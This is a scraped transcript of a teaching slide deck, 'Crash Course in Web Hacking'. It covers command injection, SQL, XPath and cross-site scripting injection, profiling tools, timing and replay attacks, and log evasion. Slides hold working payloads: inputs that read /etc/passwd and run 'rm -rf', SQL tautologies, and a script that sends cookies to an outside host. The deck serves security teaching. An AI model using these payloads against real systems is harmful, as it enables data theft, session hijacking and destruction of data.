1 / 24

Crash Course in Web Hacking

Mike Gerschefske. Crash Course in Web Hacking. Hacking is illegal (most of the time). Understand the laws Port Scanning can be considered illegal Post 9/11 can be act of terrorism DMCA Exceptions Educational Learning (Institution). Who cares about web hacking?.

ollie
Télécharger la présentation

Crash Course in Web Hacking

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript

  1. Mike Gerschefske Crash Course in Web Hacking

  2. Hacking is illegal (most of the time) • Understand the laws • Port Scanning can be considered illegal • Post 9/11 can be act of terrorism • DMCA Exceptions • Educational Learning (Institution)

  3. Who cares about web hacking? • The days of buffer overflows and root boxes are nearing an end… • Non executing stacks • People patching their systems • Everything is turning into a web system

  4. Power of Google • Google knows all • SSN/Credit Card, backend sql • http://johnny.ihackstuff.com/ghdb.php • intitle:snc-rz30 inurl:home/ • Robots.txt • Don’t put secrets in here

  5. Power of the web browser • Is capable of HTTP GET/POST • Capable of sending any kind of GET/POST • Doesn’t have to run client side code (ie javascript) • Can send anything it wants to • Can be Bad: • url: http://somesite/index.php?section=Admin • Vertical Escalation

  6. Bad Code = Bad Security • You are not able to control client end: • Cookies • Do not put User Level (admin, user, etc.) • Vertical Escalation • Do not put user id • Horizontal Escalation • Posts • Gets • Session IDs • All Data

  7. Museum Example • Code from two years ago: • 1 #!/usr/bin/perl • … 7 $first = param('first'); • 8 $last = param('last'); • 9 $password = param('password'); • 10 • … • 25 if (($first eq "") || ($last eq "") || (! $password eq "unbreakable")) { • 26 print "<p>Could not understand or wrong password!!</p>"; • 27 } • 28 else { • 29 system "cat ./museum_ideas/${first}.${last}"; • …

  8. Some Good Combinations Dump the password file: First Name: . Last Name : /../../../../etc/passwd Password  : unbreakable Delete the whole directory: First Name: NOTEMPTY Last Name : & rm -rf /home/museum/public_html/cgi_bin/museum_ideas Password  : unbreakable

  9. Command Injection • This is basic idea of command injection • Security through obscurity sometimes works • Some people are very diligent

  10. SQL Injections • We can send commands, why not sql? • What is SQL? • What can we do with SQL? • Get any data we want (that the user has access to) • Delete all the data the user has access to • If user is root, dump database • If user is root, can upload and execute java/c from database and root box

  11. How to protect against it? • Check parameters • Not really… • Need to do SQL parameterization when at all possible • Mark strings as strings, ints as ints SELECT * WHERE name = @

  12. Why doesn’t checking params work? • If you’re really smart it will, but if you don’t understand the problem it wont • This is a very difficult problem to understand • Example: • http://viva/ictf/index.php/SQL_Injection • The problem is the ‘ (apostrophe) is a special character • To fix we just find and replace all apostrophe’s with two ‘’ as that’s how we insert apostrophes in a string • NO!

  13. Second Level SQL Injection • The problem actually isn’t solved, just more complicated • Take: Username = ' OR 'a' = 'a‘ SELECT * FROM Users WHERE UserName = ''' OR ''a'' = ''a''

  14. Goes in fine but coming out… • Get username from DB and put in var • Var contains SQL • We TRUST DB to give us good data • Create another SQL Query and the second one is now vulnerable • SELECT content FROM database WHERE username = VUNSQL

  15. XSS – Cross Site Scripting • Malicious injection of JavaScript • Cookie Hi-jacking • MySpace – Replicate itself, add friends • Samy - http://web.archive.org/web/20060208182348/namb.la/popular/tech.html <script> document.write(“<imgsrc=http://site.com/a.jpg?cookie= “ + document.cookie) </script>

  16. Xpath Injection • //user[name/test() = ‘’ or 1=1 or ‘’ and password/text() = ‘junk’] • Used with: • XML RPC • SOAP/WSDL

  17. IDS Will Find You • SQL/Command Injection is very easy to detect • IDS poor at packet fragmentation with timing attacks

  18. Profiling • Need to know what you’re attacking • Can search for exploits • HEAD / HTTP/1.0 Example • Everyone’s a little different • Nmap is a good profiler • Nessus will profile too

  19. Tools • Add N Edit Cookie – Mozilla Firefox extension • Wget • TamperData – FireFox • Modify Headers - FireFox • Curl • Netcat/Telnet • Proxies • Paros Proxy – Free • Fiddler – Microsoft, Free • Spike – Free

  20. Timing Attacks • Breaking Authentication • Username and password wrong may take x time while username doesn’t exist takes y time • Successful timing attacks against encryption

  21. ASP.NET Exploit • Debugging (source code) only available to localhost • Bypass this check by sending the following: • GET http://localhost/bleh.asp?a=j HTTP/1.0 • Check’s server name variable rather then remote address

  22. Mod_security • http://www.modsecurity.org/

  23. Replay Attacks • Socrebot deletes flag • Scorebot adds flag • Since the scorebot goes to everyone we have the delete and add sequence • Can potentially replay same delete sequence across all enemy servers

  24. Log Evasion • Many logs only log ~4K of URL • Prevents DOS from filling up logs • If payload at the end of 4k, wont log malicious payload • http://somewhre.com/page.asp?foo=....&payload=MYPAYLOAD • Application ignores foo parameter • Log shows up as GET /page.asp … • Not just IIS, Sun One App Server

More Related